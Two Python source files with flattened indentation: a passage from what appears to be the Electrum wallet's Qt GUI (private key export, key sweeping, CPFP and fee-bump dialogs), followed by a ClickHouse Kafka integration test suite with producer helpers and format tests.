if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
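        # export keys one by one on a worker thread so the dialog stays responsive and can be cancelled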
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
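        # highlight the destination field in red while its address is invalid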
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(
parent=self,
title=title,
header_layout=header_layout,
ok_label=_('Import'),
allow_multi=True,
config=self.config,
)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
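                # allow toggling if the plugin is available but not loaded, or loaded and user-disableable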
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx: Transaction, new_tx: PartialTransaction) -> None:
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
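        # recompute output amount, combined fee and combined feerate whenever the child fee is edited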
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
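        # fee for the child tx such that the combined (parent + child) package pays roughly fee_per_kb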
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
            self.show_error(f'''{_("Can't CPFP")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
            return  # fee left empty, treat it as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool:
"""Returns whether successful."""
# note side-effect: tx is being mutated
assert isinstance(tx, PartialTransaction)
try:
# note: this might download input utxos over network
BlockingWaitingDialog(
self,
_("Adding info to tx, from wallet and network..."),
lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False),
)
except NetworkException as e:
self.show_error(repr(e))
return False
return True
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
fee = tx.get_fee()
assert fee is not None
tx_label = self.wallet.get_label_for_txid(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
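        # manual feerate entry deactivates the slider; moving the slider re-activates it and overwrites the field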
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
grid.addWidget(feerate_e, 2, 1)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(
tx=tx,
txid=txid,
new_fee_rate=new_fee_rate,
coins=self.get_coins(),
)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_desc=tx_label)
def dscancel_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
fee = tx.get_fee()
assert fee is not None
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Cancel transaction'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Cancel an unconfirmed RBF transaction by double-spending "
"its inputs back to your wallet with a higher fee.")))
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
grid.addWidget(feerate_e, 2, 1)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.dscancel(tx=tx, new_fee_rate=new_fee_rate)
except CannotDoubleSpendTx as e:
self.show_error(str(e))
return
self.show_transaction(new_tx)
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
test.py
|
import json
import os.path as p
import random
import socket
import subprocess
import threading
import time
import logging
import io
import string
import avro.schema
import avro.io
import avro.datafile
from confluent_kafka.avro.cached_schema_registry_client import CachedSchemaRegistryClient
from confluent_kafka.avro.serializer.message_serializer import MessageSerializer
from confluent_kafka import admin
import kafka.errors
import pytest
from google.protobuf.internal.encoder import _VarintBytes
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.network import PartitionManager
from helpers.test_tools import TSV
from kafka import KafkaAdminClient, KafkaProducer, KafkaConsumer, BrokerConnection
from kafka.protocol.admin import DescribeGroupsRequest_v1
from kafka.protocol.group import MemberAssignment
from kafka.admin import NewTopic
# protoc --version
# libprotoc 3.0.0
# # to create kafka_pb2.py
# protoc --python_out=. kafka.proto
from . import kafka_pb2
from . import social_pb2
# TODO: add test for run-time offset update in CH, if we manually update it on Kafka side.
# TODO: add test for SELECT LIMIT is working.
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
main_configs=['configs/kafka.xml', 'configs/log_conf.xml'],
with_kafka=True,
with_zookeeper=True, # For Replicated Table
macros={"kafka_broker":"kafka1",
"kafka_topic_old":"old",
"kafka_group_name_old":"old",
"kafka_topic_new":"new",
"kafka_group_name_new":"new",
"kafka_client_id":"instance",
"kafka_format_json_each_row":"JSONEachRow"},
clickhouse_path_dir='clickhouse_path')
def get_kafka_producer(port, serializer, retries):
errors = []
for _ in range(retries):
try:
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(port), value_serializer=serializer)
logging.debug("Kafka Connection establised: localhost:{}".format(port))
return producer
except Exception as e:
errors += [str(e)]
time.sleep(1)
raise Exception("Connection not establised, {}".format(errors))
def producer_serializer(x):
return x.encode() if isinstance(x, str) else x
def kafka_produce(kafka_cluster, topic, messages, timestamp=None, retries=15):
logging.debug("kafka_produce server:{}:{} topic:{}".format("localhost", kafka_cluster.kafka_port, topic))
producer = get_kafka_producer(kafka_cluster.kafka_port, producer_serializer, retries)
for message in messages:
producer.send(topic=topic, value=message, timestamp_ms=timestamp)
producer.flush()
## just to ensure the python client / producer is working properly
def kafka_producer_send_heartbeat_msg(max_retries=50):
kafka_produce(cluster, 'test_heartbeat_topic', ['test'], retries=max_retries)  # module-level `cluster` is the object the kafka_cluster fixture yields
def kafka_consume(kafka_cluster, topic):
consumer = KafkaConsumer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), auto_offset_reset="earliest")
consumer.subscribe(topics=[topic])
for toppar, messages in list(consumer.poll(5000).items()):
if toppar.topic == topic:
for message in messages:
yield message.value.decode()
consumer.unsubscribe()
consumer.close()
def kafka_produce_protobuf_messages(kafka_cluster, topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, topic, start_index, num_messages):
data = ''
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
producer.send(topic=topic, value=serialized_msg)
producer.flush()
logging.debug("Produced {} messages for topic {}".format(num_messages, topic))
def kafka_produce_protobuf_social(kafka_cluster,topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = social_pb2.User()
msg.username='John Doe {}'.format(i)
msg.timestamp=1000000+i
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def avro_message(value):
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
bytes_writer = io.BytesIO()
# writer = avro.io.DatumWriter(schema)
# encoder = avro.io.BinaryEncoder(bytes_writer)
# writer.write(value, encoder)
# DataFileWriter seems to be mandatory to get the schema encoded
writer = avro.datafile.DataFileWriter(bytes_writer, avro.io.DatumWriter(), schema)
if isinstance(value, list):
for v in value:
writer.append(v)
else:
writer.append(value)
writer.flush()
raw_bytes = bytes_writer.getvalue()
writer.close()
bytes_writer.close()
return raw_bytes
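# Illustrative helper, not part of the original test suite: produce a single
# Avro-encoded row built by avro_message() to a topic. The helper name and the
# example topic below are assumptions.
def kafka_produce_avro_row(kafka_cluster, topic, row):
    # avro_message() returns raw bytes, which producer_serializer passes through unchanged.
    kafka_produce(kafka_cluster, topic, [avro_message(row)])
# Usage sketch:
# kafka_produce_avro_row(kafka_cluster, 'avro_topic',
#                        {'id': 0, 'blockNo': 0, 'val1': 'AM', 'val2': 0.5, 'val3': 1})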
def avro_confluent_message(schema_registry_client, value):
# type: (CachedSchemaRegistryClient, dict) -> str
serializer = MessageSerializer(schema_registry_client)
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
return serializer.encode_record_with_schema('test_subject', schema, value)
# Since everything is async and shaky when receiving messages from Kafka,
# we may want to try and check results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
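# A minimal sketch (not in the original file) of the "check results multiple
# times in a loop" pattern mentioned above; the helper name and the timeout
# value are assumptions.
def kafka_check_result_with_retries(query_result_fn, timeout=60):
    # Accumulate query output until it matches the reference file, or give up
    # after `timeout` seconds and return the final comparison.
    deadline = time.time() + timeout
    result = ''
    while time.time() < deadline:
        result += query_result_fn()
        if kafka_check_result(result):
            return True
        time.sleep(0.5)
    return kafka_check_result(result)
# Usage sketch:
# assert kafka_check_result_with_retries(lambda: instance.query('SELECT * FROM test.kafka', ignore_error=True))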
def describe_consumer_group(kafka_cluster, name):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
consumer_groups = admin_client.describe_consumer_groups([name])
res = []
for member in consumer_groups[0].members:
member_info = {}
member_info['member_id'] = member.member_id
member_info['client_id'] = member.client_id
member_info['client_host'] = member.client_host
member_topics_assignment = []
for (topic, partitions) in member.member_assignment.assignment:
member_topics_assignment.append({'topic': topic, 'partitions': partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
global kafka_id
cluster.start()
kafka_id = instance.cluster.kafka_docker_id
print(("kafka_id is {}".format(kafka_id)))
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP DATABASE IF EXISTS test; CREATE DATABASE test;')
wait_kafka_is_available() # ensure kafka is alive
kafka_producer_send_heartbeat_msg() # ensure python kafka client is ok
# print("kafka is available - running test")
yield # run test
# Tests
@pytest.mark.timeout(180)
def test_kafka_settings_old_syntax(kafka_cluster):
assert TSV(instance.query("SELECT * FROM system.macros WHERE macro like 'kafka%' ORDER BY macro",
ignore_error=True)) == TSV('''kafka_broker kafka1
kafka_client_id instance
kafka_format_json_each_row JSONEachRow
kafka_group_name_new new
kafka_group_name_old old
kafka_topic_new new
kafka_topic_old old
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('{kafka_broker}:19092', '{kafka_topic_old}', '{kafka_group_name_old}', '{kafka_format_json_each_row}', '\\n');
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'old')
assert members[0]['client_id'] == 'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:9092 --describe --members --group old --verbose"))
@pytest.mark.timeout(180)
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = '{kafka_broker}:19092',
kafka_topic_list = '{kafka_topic_new}',
kafka_group_name = '{kafka_group_name_new}',
kafka_format = '{kafka_format_json_each_row}',
kafka_row_delimiter = '\\n',
kafka_client_id = '{kafka_client_id} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
# Insert a couple of malformed messages.
kafka_produce(kafka_cluster, 'new', ['}{very_broken_message,'])
kafka_produce(kafka_cluster, 'new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'new')
assert members[0]['client_id'] == 'instance test 1234'
@pytest.mark.timeout(180)
def test_kafka_json_as_string(kafka_cluster):
kafka_produce(kafka_cluster, 'kafka_json_as_string', ['{"t": 123, "e": {"x": "woof"} }', '', '{"t": 124, "e": {"x": "test"} }',
'{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}'])
instance.query('''
CREATE TABLE test.kafka (field String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_json_as_string',
kafka_group_name = 'kafka_json_as_string',
kafka_format = 'JSONAsString',
kafka_flush_interval_ms=1000;
''')
result = instance.query('SELECT * FROM test.kafka;')
expected = '''\
{"t": 123, "e": {"x": "woof"} }
{"t": 124, "e": {"x": "test"} }
{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}
'''
assert TSV(result) == TSV(expected)
assert instance.contains_in_log(
"Parsing of message (topic: kafka_json_as_string, partition: 0, offset: [0-9]*) return no rows")
@pytest.mark.timeout(120)
def test_kafka_formats(kafka_cluster):
schema_registry_client = CachedSchemaRegistryClient('http://localhost:{}'.format(kafka_cluster.schema_registry_port))
# data was dumped from clickhouse itself in the following manner
